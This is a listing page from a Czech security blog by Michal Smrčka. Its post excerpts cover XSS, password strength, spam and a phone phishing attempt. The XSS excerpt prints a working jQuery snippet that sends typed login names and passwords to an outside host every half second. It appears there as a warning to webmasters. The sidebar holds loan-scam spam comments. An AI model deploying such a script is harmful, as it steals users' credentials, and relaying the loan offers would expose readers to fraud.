Bezpečnost a hacking | Michal Smrčka - blog

Aukro v nové soutěži odměnuje šikovné programátory

V těchto dnech probíhá na Aukro.cz soutěž „Aukro naděluje“. Každý den organizátoři umístí do nějaké náhodné sekce na Aukru relativně hodnotné produkty za směšně nízkou cenu. Je k dispozici vždy pouze 1 kus. Vy musíte tento produkt najít a zakoupit jako první.

O soutěži jsem se dozvěděl na Twitteru a nebýt následujícího odvážného prohlášení Aukra, ani bych se jí příliš nezaobíral:

foto

foto

„Nebojte, na roboty a podvodné programy jsme mysleli, takže tudy cesta nevede.“


18. 11. 2011 v 16:04 • Bezpečnost a hacking • autor Michal Smrčka85 komentářů

S XSS zranitelností se dá napáchat více škody, než si myslíte

Otázka pro webmastery: Víte, co dělá následující jQuery kód?

<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>

Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.

Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.


13. 11. 2010 v 20:45 • Bezpečnost a hacking • autor Michal Smrčka1 komentář

Na délce záleží! Jak zvolit správné heslo?

Průměrný uživatel používá k přihlášení na webové služby velmi slabá hesla. Tak slabá, že případný útočník dokáže za několik hodin, příp. dní heslo v plné své kráse odhalit. Lidé toto zbytečně podceňují, navíc zvolit si těžko prolomitelné heslo nemusí být vůbec složité!

Nejdříve pár čísel.

V souvislosti se statistikami hesel pocházejícími ze vzorku více než 800.000 uživatelských účtů vyplynuly tyto závěry: *

  • 9% uživatelů má heslo dlouhé jen 4 znaky nebo méně
  • ovšem heslo o maximální délce 6 znaků (pořád slabé) používá více než 50% lidí!
  • počet hesel, který dokáže počítač automaticky tipnout za jednu sekundu, se pohybuje mezi 20 a 100 za sekundu **
  • zjištění čtyřmístného hesla tedy brutal-force útokem zpravidla trval maximálně 40 hodin, v praxi je to ale mnohem méně
  • odhalení pětimístného hesla by bylo jisté maximálně za 24 dní, ovšem za předpokladu zapojení více paralelních počítačů je možné proces urychlit
  • pokud máte maximálně šestimístné heslo, prodloužila by se maximální doba zjištění na téměř 2,5 roku, nicméně také platí, že v případě zapojení více počítačů se doba zkrátí :)

20. 09. 2009 v 21:29 • Bezpečnost a hacking • autor Michal Smrčka10 komentářů

"Legální" spam - nenechte se napálit

spam Jistá česká společnost (reklamu jim tu dělat nehodlám) mi poslala nevyžádané obchodní sdělení (tedy spam). Propaguje v něm svoje služby a produkty s odkazem na webové stránky.

Normální spam, řekli byste. Jenže ne tak docela. Zajímavé je, že společnost se v něm ohání zákonem a několikrát v e-mailu upozorňuje, že jejich spam je vlastně legální:

"Tento email nelze dle výkladu ustanovení § 7 od. 1 zákona č. 480/2004 Sb. o některých službách informační společnosti považovat za nevyžádanou zprávu, neboť je nezbytným právním krokem učiněným ve smyslu získání souhlasu se zasíláním obchodního sdělení."


02. 09. 2009 v 13:41 • Bezpečnost a hacking • autor Michal Smrčka2 komentáře

Řekněte mi, prosím, Vaše heslo...

Příchozí hovor z klasického telefonního čísla s předvolbou 776:

„Dobrý den, mluvím s panem Michalem Smrčkou?“
„Ano, u telefonu.“
„Vidím, že využíváte služby našeho operátora a měl bych pro Vás výhodnou nabídku. Nicméně potřeboval bych si Vás ověřit. Můžete mi, prosím, pro kontrolu sdělit Vaše osobní heslo?“

Jak byste zareagovali v mém případě?


21. 06. 2009 v 19:15 • Bezpečnost a hacking • autor Michal Smrčka3 komentáře

Stránka: 1 2 >

Kategorie blogu

Twitter feed

Poslední články

Poslední komentáře

kings jone: Hledáte půjčku na zaplacení všech vašich účtů nebo zahájení nového podnikání nebo jakéhokoli druhu půjčky, kontaktujte tohoto muže z BŮH PASTOR KINGS JONE, který mi pomohl se svou půjčkou ve výši 35 000 USD poté, co byl družstevně financován jinými poskytovateli půjček. Je... Ukázat
markkent5050@gmail.com: Affordable Loan Offer ( markkent5050@gmail.com) Do You Need A Loan? ( tomyanis247@gmail.com >>>markkent5051@gmail.com) Eintrag Good Day Sir/Madam: Do you need an urgent loan to finance your business or in any purpose? We are certified,legitimate and international licensed Loan Factory we offer loans to Business firms.interest... Ukázat
markkent5050@gmail.com: Affordable Loan Offer ( markkent5050@gmail.com) Do You Need A Loan? ( tomyanis247@gmail.com >>>markkent5051@gmail.com) Eintrag Good Day Sir/Madam: Do you need an urgent loan to finance your business or in any purpose? We are certified,legitimate and international licensed Loan Factory we offer loans to Business firms.interest... Ukázat
BLESSING: Necesitas un préstamo? ¿Está interesado en obtener algún tipo de préstamo? ¿Está usted preocupado financieramente? Tienes una deuda que pagar Damos préstamos a cualquier parte del mundo. Nuestras tasas de interés sobre el préstamo son 2% anulado con una duración negociable, independientemente de... Ukázat
Jeff michael: - Dobrý den Potřebujete naléhavě potřebné půjčky? Poskytujeme půjčky Potenciální kupci se zárukou dobré víry. Ty jsi Vážně potřebují naléhavou půjčku? Takže jste uvnitř Správné místo. Dáváme podnikové půjčky, osobní půjčky, oceňujeme Minimální částka 2 000,00 EUR pro maximální cenu 40 000 000,00 EUR, kontaktujte nás prosím Pro Vaši půjčku... Ukázat

Vyhledávání

Nastavení

Velikost písma: Abc Abc Abc